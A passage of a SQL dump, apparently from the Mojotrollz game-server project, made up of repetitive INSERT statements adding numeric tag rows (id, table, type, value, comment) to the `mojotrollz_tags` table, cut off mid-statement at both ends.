'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13300, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13300, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13300, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13301, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13316, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13316, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13316, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13317, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13317, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13317, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13318, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13318, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13318, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13319, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13319, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13319, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13320, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13320, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13320, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13321, 1, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13321, 1, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13321, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13322, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13322, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13323, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13323, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13323, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13324, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13325, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13325, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13325, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13326, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13326, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13326, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13327, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13327, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13327, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13328, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13328, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13328, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13329, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13330, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13331, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13331, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13331, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13332, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13332, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13332, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13333, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13334, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13335, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13335, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13335, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13336, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13336, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13336, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13337, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13338, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13356, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13357, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13358, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13358, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13359, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13359, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13377, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13377, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13377, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13378, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13396, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13396, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13396, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13397, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13397, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13397, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13416, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13417, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13417, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13417, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13417, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13417, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13417, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13418, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13418, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13419, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13420, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13420, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13421, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13421, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13421, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13422, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13422, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13422, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13424, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13425, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13425, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13425, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13426, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13426, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13426, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13427, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13428, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13428, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13428, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13429, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13429, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13430, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13430, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13431, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13432, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13433, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13433, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13434, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13435, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13435, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13436, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13436, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13437, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13437, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13437, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13438, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13438, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13438, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13439, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13439, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13439, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13440, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13441, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13441, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13441, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13442, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13442, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13442, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13443, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13443, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13443, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13444, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13444, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13445, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13445, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13446, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13446, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13446, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13447, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13447, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13447, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13448, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13448, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13448, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13449, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13476, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13476, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13477, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13516, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13517, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13518, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13519, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13520, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13521, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13522, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13523, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13524, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13525, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13525, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13525, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13526, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13527, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13528, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13529, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13530, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13531, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13533, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13533, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13533, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13534, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13535, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13536, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13536, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13536, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13537, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13538, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13539, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13539, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13539, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13540, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13541, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13542, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13543, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13544, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13545, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13545, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13545, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13546, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13546, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13546, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13547, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13548, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13548, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13548, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13549, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13550, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13551, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13551, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13551, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13552, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13553, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13554, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13554, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13554, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13555, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13556, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13557, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13557, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13557, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13576, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13576, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13576, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13577, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13577, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13577, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13596, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13596, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13596, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13597, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13597, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13597, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13598, 1, 1, 30, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13598, 1, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13598, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13599, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13599, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13599, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13601, 1, 1, 349, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13601, 1, 2, 2100, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13601, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (13602, 1, 1, 0, 